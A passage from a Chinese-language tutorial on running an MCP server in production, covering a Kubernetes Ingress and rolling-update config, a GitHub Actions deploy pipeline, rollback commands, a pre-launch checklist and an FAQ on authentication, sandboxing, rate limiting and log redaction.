secretName: mcp-gateway-tls-secret
rules:
- host: mcp-gateway.example.com
http:
paths:
- path: /mcp
pathType: Prefix
backend:
service:
name: mcp-server
port:
number: 3000
- path: /health
pathType: Exact
backend:
service:
name: mcp-server
port:
number: 3000
CI/CD 流水线(GitHub Actions)
每次代码推送到 main 分支时自动构建、测试、构建 Docker 镜像并部署到 Kubernetes:
# .github/workflows/deploy.yml — MCP Server CI/CD 流水线
name: Deploy MCP Server
on:
push:
branches: [main]
pull_request:
branches: [main]
env:
REGISTRY: registry.example.com
IMAGE_NAME: mcp-server
jobs:
# === 阶段 1:测试 ===
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: "20"
cache: "npm"
- run: npm ci
- run: npm run typecheck # TypeScript 类型检查
- run: npm run lint # ESLint
- run: npm test -- --coverage # 单元测试 + 覆盖率
- name: Security audit
run: npm audit --audit-level=high
# === 阶段 2:构建并推送镜像 ===
build:
needs: test
if: github.ref == 'refs/heads/main' # 仅 main 分支构建镜像
runs-on: ubuntu-latest
outputs:
image_tag: ${{ steps.meta.outputs.version }}
steps:
- uses: actions/checkout@v4
- name: Generate image tag
id: meta
run: |
TAG=$(date +%Y%m%d-%H%M%S)-${GITHUB_SHA::7}
echo "version=${TAG}" >> $GITHUB_OUTPUT
- name: Build Docker image
run: |
docker build -t $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }} \
-t $REGISTRY/$IMAGE_NAME:latest .
- name: Push to registry
run: |
docker push $REGISTRY/$IMAGE_NAME:${{ steps.meta.outputs.version }}
docker push $REGISTRY/$IMAGE_NAME:latest
# === 阶段 3:部署到 Kubernetes ===
deploy:
needs: build
runs-on: ubuntu-latest
environment: production
steps:
- uses: actions/checkout@v4
- name: Set image tag in deployment
run: |
sed -i "s|image: .*mcp-server:.*|image: $REGISTRY/$IMAGE_NAME:${{ needs.build.outputs.image_tag }}|" \
k8s/deployment.yaml
- name: Deploy to Kubernetes
uses: azure/k8s-deploy@v4
with:
manifests: |
k8s/deployment.yaml
k8s/service.yaml
images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ needs.build.outputs.image_tag }}
strategy: rolling # 使用 Deployment 中定义的滚动更新策略
滚动更新与回滚策略
MCP Server 的滚动更新需要考虑 SSE 长连接的平滑断开:
# k8s/strategy.yaml — 针对 MCP 长连接的滚动更新策略
spec:
strategy:
type: RollingUpdate
rollingUpdate:
maxSurge: 1 # 最多多出 1 个新 Pod
maxUnavailable: 0 # 更新期间不允许服务降级
template:
spec:
# Pod 优雅终止——给 SSE 连接 30 秒完成当前工具调用
terminationGracePeriodSeconds: 45
containers:
- name: mcp-server
lifecycle:
preStop:
exec:
command:
- /bin/sh
- -c
- |
# 1. 标记 Pod 为 "draining",停止接收新连接
echo "draining" > /tmp/pod-status
# 2. 等待现有 SSE 连接完成(最多 30 秒)
sleep 30
# 3. 优雅关闭
kill -TERM 1
回滚命令——当新版本出问题时,一条命令回到上一个稳定版本:
# 查看部署历史
kubectl rollout history deployment/mcp-server -n mcp-production
# 回滚到上一个版本
kubectl rollout undo deployment/mcp-server -n mcp-production
# 回滚到指定版本
kubectl rollout undo deployment/mcp-server -n mcp-production --to-revision=3
# 监控回滚状态
kubectl rollout status deployment/mcp-server -n mcp-production
Kubernetes 的 Deployment 会保留最近 10 个 ReplicaSet(可通过 revisionHistoryLimit 调整),每次滚动更新都会创建新的 ReplicaSet。回滚的本质就是切换到之前的 ReplicaSet——快速、可靠、一条命令完成。
部署检查清单
在点下"部署"按钮之前,对照这份清单逐项确认:
| ✓ | 检查项 | 验证方法 |
|---|---|---|
| ☐ | 所有密钥已迁移到 K8s Secrets / Vault | kubectl get secrets -n mcp-production |
| ☐ | TLS 证书已配置 cert-manager 自动续期 | kubectl get certificates -n mcp-production |
| ☐ | 健康检查端点返回 healthy | curl -s https://mcp-gateway.example.com/health | jq .status |
| ☐ | Prometheus 指标端点可被抓取 | curl -s http://mcp-server:9090/metrics | head |
| ☐ | 认证中间件拒绝无 Token 请求(返回 401) | curl -s -o /dev/null -w "%{http_code}" https://mcp-gateway.example.com/mcp |
| ☐ | 限流中间件触发 429 并返回 Retry-After | 并发压测工具(如 k6)短时间内发送 100+ 请求 |
| ☐ | Docker 沙箱正确隔离(网络=none) | docker inspect mcp-sandbox-* | jq '.[].HostConfig.NetworkMode' |
| ☐ | 结构化日志输出 JSON 格式 | kubectl logs deployment/mcp-server | head -1 | jq . |
| ☐ | 告警规则已配置并测试触发 | 检查 Alertmanager 或 Grafana Alerting 面板 |
| ☐ | 已执行至少一次滚动更新 + 回滚演练 | kubectl rollout undo + 确认服务 0 中断 |
全部打勾之后,你的 MCP Server 已经具备了生产环境所需的全部防护能力——从传输层到应用层,从认证到沙箱,从监控到回滚。
可引用定义:MCP 生产级服务器(Production-grade MCP Server)是一套完整的安全、隔离和可观测性体系——在 MCP 协议核心(Tools/Resources/Prompts)之上,叠加传输层加固(TLS + Streamable HTTP)、认证授权(OAuth 2.1 + 工具级 RBAC)、沙箱隔离(Docker/gVisor 容器化执行)、网关路由(Nginx 多服务聚合)、限流防滥用(令牌桶 + 工具权重配额)和可观测性(OpenTelemetry 追踪 + Prometheus 指标 + 结构化日志),从而实现面向多租户、多服务、公网暴露的企业级 AI Agent 工具平台。
常见问题
MCP Server 不做加固可以直接上生产吗?
不建议。MCP 官方参考实现是为开发环境设计的——没有内置认证、没有沙箱隔离、没有监控告警。直接暴露到生产环境会面临至少以下风险:未授权访问(任何人连上就能调用工具)、命令注入(工具参数中的恶意命令可能被执行)、资源耗尽(无限制的工具调用可以打垮服务器)。强烈建议至少完成 OAuth 2.1 认证、Docker 沙箱隔离和基础监控(Prometheus + 结构化日志)这三项 P0 加固后再部署到生产环境。
stdio 和 Streamable HTTP 应该选哪个?
看使用场景:
- 用 stdio:只有你自己用(本地 Claude Desktop、IDE 插件)、Client 和 Server 在同一台机器上、不需要网络认证和监控。
- 用 Streamable HTTP:多个用户/应用需要同时访问、Client 和 Server 在不同机器上(远程部署)、需要细粒度的认证授权和多租户隔离、需要运维能力(健康检查、日志、指标)。
一个简单的判断法则——如果只有你一个人用,用 stdio。如果别人也要用,必须用 Streamable HTTP + TLS。
Docker 沙箱和 gVisor 怎么选?
从 Docker 开始,按需升级。Docker 的 namespace + cgroups 隔离对 99% 的生产场景已经足够——它提供了进程、文件系统、网络和资源的全面隔离,而且几乎所有的 CI/CD 和编排系统都原生支持 Docker。
只有在以下场景才需要升级到 gVisor:
- 服务多个外部客户(多租户 SaaS),需要更强的内核级隔离
- 工具执行高度不可信的用户代码(如用户上传的自定义脚本)
- 金融、医疗等有合规要求的高安全场景
gVisor 的额外开销约 5-10% 性能损失和额外的运维复杂度(需要安装 containerd + runsc 运行时),不建议作为默认方案。
如何限制 LLM 调用的工具数量以防滥用?
三层控制体系:
- 认证层 — 通过 OAuth scope 限制用户可调用的工具范围。例如只读用户只能调用
query_*、read_*前缀的工具。 - 网关/应用层 — 在 Nginx 或 API 网关中配置每个客户端/租户的每分钟调用配额(令牌桶限流),以及并发工具执行上限。
- Server 层 — 通过工具白名单环境变量限制暴露给 LLM 的工具列表。即使代码中注册了 20 个工具,只有白名单中的才会对 LLM 可见。配合工具权重配额,确保重量操作不会耗尽资源。
MCP Server 的日志应该记录哪些信息?如何保护敏感数据?
应该记录的信息(每条工具调用):
- 时间戳(ISO 8601 UTC)、用户 ID / 客户端 ID
- 工具名称、调用参数(脱敏后——移除 API Key、密码、Token 等)
- 执行耗时(毫秒)、沙箱容器 ID、退出码
- 是否命中限流规则、认证结果(成功/失败原因)
绝不能记录的信息:
- 完整的 JWT Token、API Key、密码
- 用户的 PII(个人身份信息)——如邮箱、手机号、身份证号
- 工具返回的敏感业务数据(如完整的数据库查询结果)
日志应采用 JSON 结构化格式输出(见第 6 章代码示例),便于 ELK/Loki/阿里云 SLS 等日志聚合系统按字段过滤和聚合。